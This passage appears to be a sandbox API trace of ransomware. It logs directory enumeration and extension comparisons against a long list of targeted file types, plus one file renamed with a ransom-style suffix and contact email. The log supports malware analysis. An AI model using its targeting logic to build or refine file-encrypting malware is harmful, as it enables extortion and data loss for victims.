(lpString=".msg") returned 4 [0168.729] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mxl") returned 4 [0168.729] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".myd") returned 4 [0168.729] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".myi") returned 4 [0168.729] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".nef") returned 4 [0168.730] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".nrw") returned 4 [0168.730] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".obj") returned 4 [0168.730] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".odb") returned 4 [0168.730] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".odc") returned 4 [0168.730] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".odm") returned 4 [0168.730] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".odp") returned 4 [0168.730] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".ods") returned 4 [0168.730] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".oft") returned 4 [0168.730] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".one") returned 4 [0168.730] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".onepkg") returned 7 [0168.730] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0168.730] lstrlenW (lpString=".onetoc2") returned 8 [0168.730] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0168.730] lstrlenW (lpString=".opt") returned 4 [0168.730] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0168.730] lstrlenW (lpString=".oqy") returned 4 [0168.731] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".orf") returned 4 [0168.731] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".p12") returned 4 [0168.731] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".p7b") returned 4 [0168.731] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".p7c") returned 4 [0168.731] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pam") returned 4 [0168.731] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pbm") returned 4 [0168.731] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pct") returned 4 [0168.731] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pcx") returned 4 [0168.731] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pdd") returned 4 [0168.731] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pdf") returned 4 [0168.731] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pdp") returned 4 [0168.731] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pef") returned 4 [0168.731] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0168.731] lstrlenW (lpString=".pem") returned 4 [0168.731] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".pff") returned 4 [0168.732] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".pfm") returned 4 [0168.732] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".pfx") returned 4 [0168.732] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".pgm") returned 4 [0168.732] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".php") returned 4 [0168.732] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".php3") returned 5 [0168.732] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0168.732] lstrlenW (lpString=".php4") returned 5 [0168.732] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0168.732] lstrlenW (lpString=".php5") returned 5 [0168.732] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0168.732] lstrlenW (lpString=".phtml") returned 6 [0168.732] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0168.732] lstrlenW (lpString=".pict") returned 5 [0168.732] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0168.732] lstrlenW (lpString=".pl") returned 3 [0168.732] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0168.732] lstrlenW (lpString=".pls") returned 4 [0168.732] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0168.732] lstrlenW (lpString=".pm") returned 3 [0168.732] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0168.732] lstrlenW (lpString=".png") returned 4 [0168.732] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".pnm") returned 4 [0168.733] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".pot") returned 4 [0168.733] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".potm") returned 5 [0168.733] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".potx") returned 5 [0168.733] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".ppa") returned 4 [0168.733] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".ppam") returned 5 [0168.733] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".ppm") returned 4 [0168.733] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".pps") returned 4 [0168.733] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".ppsm") returned 5 [0168.733] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".ppt") returned 4 [0168.733] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".pptm") returned 5 [0168.733] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".pptx") returned 5 [0168.733] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0168.733] lstrlenW (lpString=".prn") returned 4 [0168.733] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0168.733] lstrlenW (lpString=".ps") returned 3 [0168.733] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0168.734] lstrlenW (lpString=".psb") returned 4 [0168.734] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".psd") returned 4 [0168.734] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".pst") returned 4 [0168.734] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".ptx") returned 4 [0168.734] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".pub") returned 4 [0168.734] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".pwm") returned 4 [0168.734] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0168.734] lstrlenW (lpString=".pxr") returned 4 [0168.734] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0168.734] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594d6329, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x594d6329, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x594d6329, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0168.734] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0168.734] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0168.735] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0168.735] FindClose (in: hFindFile=0x802058 | out: hFindFile=0x802058) returned 1 [0168.735] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0168.735] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0168.735] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0168.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028") returned 26 [0168.735] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59bb102a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801ed8 [0168.736] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59bb102a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.736] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.736] lstrlenW (lpString="eula.rtf") returned 8 [0168.736] lstrlenW (lpString=".1cd") returned 4 [0168.736] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.736] lstrlenW (lpString=".3ds") returned 4 [0168.736] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0168.736] lstrlenW (lpString=".3fr") returned 4 [0168.736] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0168.736] lstrlenW (lpString=".3g2") returned 4 [0168.736] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0168.736] lstrlenW (lpString=".3gp") returned 4 [0168.736] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0168.736] lstrlenW (lpString=".7z") returned 3 [0168.736] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.736] lstrlenW (lpString=".accda") returned 6 [0168.736] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0168.736] lstrlenW (lpString=".accdb") returned 6 [0168.736] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0168.736] lstrlenW (lpString=".accdc") returned 6 [0168.737] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0168.737] lstrlenW (lpString=".accde") returned 6 [0168.737] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0168.737] lstrlenW (lpString=".accdt") returned 6 [0168.737] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0168.737] lstrlenW (lpString=".accdw") returned 6 [0168.737] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0168.737] lstrlenW (lpString=".adb") returned 4 [0168.737] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".adp") returned 4 [0168.737] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai") returned 3 [0168.737] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0168.737] lstrlenW (lpString=".ai3") returned 4 [0168.737] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai4") returned 4 [0168.737] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai5") returned 4 [0168.737] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai6") returned 4 [0168.737] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai7") returned 4 [0168.737] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".ai8") returned 4 [0168.737] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0168.737] lstrlenW (lpString=".anim") returned 5 [0168.738] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0168.738] lstrlenW (lpString=".arw") returned 4 [0168.738] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".as") returned 3 [0168.738] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0168.738] lstrlenW (lpString=".asa") returned 4 [0168.738] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".asc") returned 4 [0168.738] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".ascx") returned 5 [0168.738] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0168.738] lstrlenW (lpString=".asm") returned 4 [0168.738] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".asmx") returned 5 [0168.738] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0168.738] lstrlenW (lpString=".asp") returned 4 [0168.738] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".aspx") returned 5 [0168.738] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0168.738] lstrlenW (lpString=".asr") returned 4 [0168.738] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".asx") returned 4 [0168.738] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".avi") returned 4 [0168.738] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0168.738] lstrlenW (lpString=".avs") returned 4 [0168.738] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".backup") returned 7 [0168.739] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0168.739] lstrlenW (lpString=".bak") returned 4 [0168.739] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".bay") returned 4 [0168.739] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".bd") returned 3 [0168.739] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0168.739] lstrlenW (lpString=".bin") returned 4 [0168.739] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".bmp") returned 4 [0168.739] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".bz2") returned 4 [0168.739] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".c") returned 2 [0168.739] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0168.739] lstrlenW (lpString=".cdr") returned 4 [0168.739] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".cer") returned 4 [0168.739] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".cf") returned 3 [0168.739] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0168.739] lstrlenW (lpString=".cfc") returned 4 [0168.739] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".cfm") returned 4 [0168.739] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0168.739] lstrlenW (lpString=".cfml") returned 5 [0168.739] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0168.740] lstrlenW (lpString=".cfu") returned 4 [0168.740] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".chm") returned 4 [0168.740] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".cin") returned 4 [0168.740] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".class") returned 6 [0168.740] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0168.740] lstrlenW (lpString=".clx") returned 4 [0168.740] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".config") returned 7 [0168.740] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0168.740] lstrlenW (lpString=".cpp") returned 4 [0168.740] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".cr2") returned 4 [0168.740] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".crt") returned 4 [0168.740] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".crw") returned 4 [0168.740] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".cs") returned 3 [0168.740] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0168.740] lstrlenW (lpString=".css") returned 4 [0168.740] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".csv") returned 4 [0168.740] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0168.740] lstrlenW (lpString=".cub") returned 4 [0168.740] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dae") returned 4 [0168.741] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dat") returned 4 [0168.741] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".db") returned 3 [0168.741] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0168.741] lstrlenW (lpString=".dbf") returned 4 [0168.741] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dbx") returned 4 [0168.741] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dc3") returned 4 [0168.741] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dcm") returned 4 [0168.741] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dcr") returned 4 [0168.741] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".der") returned 4 [0168.741] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dib") returned 4 [0168.741] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dic") returned 4 [0168.741] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".dif") returned 4 [0168.741] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0168.741] lstrlenW (lpString=".divx") returned 5 [0168.741] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0168.741] lstrlenW (lpString=".djvu") returned 5 [0168.742] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0168.742] lstrlenW (lpString=".dng") returned 4 [0168.742] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".doc") returned 4 [0168.742] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".docm") returned 5 [0168.742] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0168.742] lstrlenW (lpString=".docx") returned 5 [0168.742] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.742] lstrlenW (lpString=".dot") returned 4 [0168.742] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".dotm") returned 5 [0168.742] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0168.742] lstrlenW (lpString=".dotx") returned 5 [0168.742] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0168.742] lstrlenW (lpString=".dpx") returned 4 [0168.742] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".dqy") returned 4 [0168.742] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".dsn") returned 4 [0168.742] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".dt") returned 3 [0168.742] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0168.742] lstrlenW (lpString=".dtd") returned 4 [0168.742] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0168.742] lstrlenW (lpString=".dwg") returned 4 [0168.742] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".dwt") returned 4 [0168.743] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".dx") returned 3 [0168.743] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0168.743] lstrlenW (lpString=".dxf") returned 4 [0168.743] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".edml") returned 5 [0168.743] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0168.743] lstrlenW (lpString=".efd") returned 4 [0168.743] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".elf") returned 4 [0168.743] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".emf") returned 4 [0168.743] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".emz") returned 4 [0168.743] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".epf") returned 4 [0168.743] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".eps") returned 4 [0168.743] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".epsf") returned 5 [0168.743] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0168.743] lstrlenW (lpString=".epsp") returned 5 [0168.743] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0168.743] lstrlenW (lpString=".erf") returned 4 [0168.743] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0168.743] lstrlenW (lpString=".exr") returned 4 [0168.744] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".f4v") returned 4 [0168.744] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".fido") returned 5 [0168.744] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0168.744] lstrlenW (lpString=".flm") returned 4 [0168.744] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".flv") returned 4 [0168.744] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".frm") returned 4 [0168.744] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".fxg") returned 4 [0168.744] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".geo") returned 4 [0168.744] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".gif") returned 4 [0168.744] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".grs") returned 4 [0168.744] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0168.744] lstrlenW (lpString=".gz") returned 3 [0168.744] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0169.040] lstrlenW (lpString=".h") returned 2 [0169.040] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0169.040] lstrlenW (lpString=".hdr") returned 4 [0169.040] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".hpp") returned 4 [0169.040] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".hta") returned 4 [0169.040] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".htc") returned 4 [0169.040] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0169.040] lstrlenW (lpString=".htm") returned 4 